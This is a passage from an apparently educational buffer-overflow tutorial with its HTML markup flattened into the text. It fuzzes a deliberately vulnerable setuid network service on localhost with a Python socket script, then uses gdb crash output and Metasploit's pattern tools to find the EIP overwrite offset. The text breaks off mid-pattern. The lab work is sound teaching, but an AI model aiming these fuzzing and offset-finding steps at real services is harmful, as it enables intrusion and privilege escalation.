app-net/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanspan class="nb"echo/span span class="err"#39;/spanThis is a top secret file!/span span class="code-line"span class="go"gt; Only people with the password should be able to view this file!#39; gt; secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw-r--r-- 1 root root 91 May 9 13:40 secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanchmod span class="m"600/span secret.txt/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw------- 1 root root 91 May 9 13:40 secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spancat secret.txt/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spansu - appuser/span span class="code-line"span class="gp"appuser@dev:~$ /spanls -l/span span class="code-line"span class="go"total 12/span/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 7824 Jun 15 13:48 app-net/span/span span class="code-line"span class="go"-rw------- 1 root root 91 May 5 09:51 secret.txt/span/span span class="code-line"span class="gp"appuser@dev:~$ /spancat secret.txt /span span class="code-line"span class="go"cat: secret.txt: Permission denied/span/span span class="code-line"/code/pre/div /td/tr/table pSo this is the setup for my development environment, my attack and target machine are the same machine, I'll just be using seperate user accounts./p pI will be attacking the application over the a href="http://www.tldp.org/LDP/nag/node66.html" target="_blank"loopback interface/a (127.0.0.1). The actual network you attack over is irrelevant I'm using the same machine and the loopback interface for simplicity and reliability./p pThe application will be running as the user codeappuser/code, the application again has the setuid bit set because the file that it sends when the correct password is received is only readable by root. This also means we are able to elevate our privileges to root as in the last 2 parts./p pWe now need to run the application on the "server side":/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /span./app-net /span span class="code-line"/code/pre/div /td/tr/table pThe server is now listening on port 9999:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~# /spanlsof span class="p"|/span grep -i listen span class="p"|/span grep span class="m"9999/span/span span class="code-line"span class="go"app-net 18826 root 3u IPv4 191330 0t0 TCP *:9999 (LISTEN)/span/span span class="code-line"/code/pre/div /td/tr/table h2Testing The App/h2 pFirst we need to look at what output we should expect normally:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanspan class="nb"echo/span -n span class="s2"quot;Aquot;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"span class="go"Wrong password: A/span/span span class="code-line"/code/pre/div /td/tr/table pSo we get "Wrong password: " and our input, I'm going to show you 2 ways to do this, first we write a fuzzer and launch it like before, we can use this python script:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="ch"#!/usr/bin/env python/span/span span class="code-line"/span span class="code-line"span class="kn"import/span span class="nn"socket/span/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="k"for/span span class="n"i/span span class="ow"in/span span class="nb"range/spanspan class="p"(/spanspan class="mi"1/spanspan class="p",/spanspan class="mi"5001/spanspan class="p"):/span span class="c1"# loop through 1 to 5001/span/span span class="code-line" span class="c1"# and use i as the incrementor/span/span span class="code-line"/span span class="code-line" span class="c1"# create a TCP socket (AF_INET = IP and SOCK_STREAM = TCP)/span/span span class="code-line" span class="n"s/span span class="o"=/span span class="n"socket/spanspan class="o"./spanspan class="n"socket/spanspan class="p"(/spanspan class="n"socket/spanspan class="o"./spanspan class="n"AF_INET/spanspan class="p",/span span class="n"socket/spanspan class="o"./spanspan class="n"SOCK_STREAM/spanspan class="p")/span/span span class="code-line"/span span class="code-line" span class="c1"# use that socket and connect to 127.0.0.1:9999/span/span span class="code-line" span class="n"s/spanspan class="o"./spanspan class="n"connect/spanspan class="p"((/spanspan class="s2"quot;127.0.0.1quot;/spanspan class="p",/span span class="mi"9999/spanspan class="p"))/span/span span class="code-line"/span span class="code-line" span class="c1"# send quot;Aquot; i number of times over the connection/span/span span class="code-line" span class="n"s/spanspan class="o"./spanspan class="n"send/spanspan class="p"(/spanspan class="s2"quot;Aquot;/spanspan class="o"*/spanspan class="n"i/spanspan class="p")/span/span span class="code-line"/span span class="code-line" span class="c1"# store the reply in a variable called reply/span/span span class="code-line" span class="n"reply/span span class="o"=/span span class="n"s/spanspan class="o"./spanspan class="n"recv/spanspan class="p"(/spanspan class="mi"2048/spanspan class="p")/span/span span class="code-line"/span span class="code-line" span class="c1"# close the socket/span/span span class="code-line" span class="n"s/spanspan class="o"./spanspan class="n"close/spanspan class="p"()/span/span span class="code-line"/span span class="code-line" span class="c1"# check the output is what we expect/span/span span class="code-line" span class="k"if/span span class="n"reply/span span class="o"!=/span span class="s2"quot;Wrong password: quot;/span span class="o"+/span span class="s2"quot;Aquot;/spanspan class="o"*/spanspan class="n"i/spanspan class="p":/span/span span class="code-line"/span span class="code-line" span class="c1"# and if not break out of the loop/span/span span class="code-line" span class="k"break/span/span span class="code-line"/span span class="code-line"span class="c1"# print what number we got to/span/span span class="code-line"span class="nb"print/span span class="n"i/span/span span class="code-line"/code/pre/div /td/tr/table pRun the script:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython app-net-fuzz.py/span span class="code-line"span class="go"528/span/span span class="code-line"/code/pre/div /td/tr/table pNow we have to verify how far it is until we overwrite EIP:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /spangdb -q ./app-net/span span class="code-line"span class="go"Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net /span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython -c span class="s1"#39;print quot;Aquot; * 528#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x0804000a in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython -c span class="s1"#39;print quot;Aquot; * 530#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x000a4141 in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython -c span class="s1"#39;print quot;Aquot; * 532#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41414141 in ?? ()/span/span span class="code-line"/code/pre/div /td/tr/table pSo the next 4 bytes after the first 528 bytes that we send overwrite EIP, lets use the second method to verify this./p pThe second method involves using a couple of tools that come with a href="https://en.wikipedia.org/wiki/Metasploit_Project" target="_blank"metasploit/a (codepattern_create.rb/code and codepattern_offset.rb/code). First we create a pattern of 5000 bytes using codepattern_create.rb/code, send this and use codepattern_offset.rb/code to find out where we overwrote EIP:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /spangdb -q ./app-net/span span class="code-line"span class="go"Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net /span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanspan class="nb"cd/span /usr/share/metasploit-framework/tools//span span class="code-line"span class="gp"testuser@dev:/usr/share/metasploit-framework/tools$ /span./pattern_create.rb span class="m"5000/span/span span class="code-line"span class="go"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk/span/span span class="code-line"span class="gp"testuser@dev:/usr/share/metasploit-framework/tools$ /spanspan class="nb"echo/span -n span class="s2"quot;Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0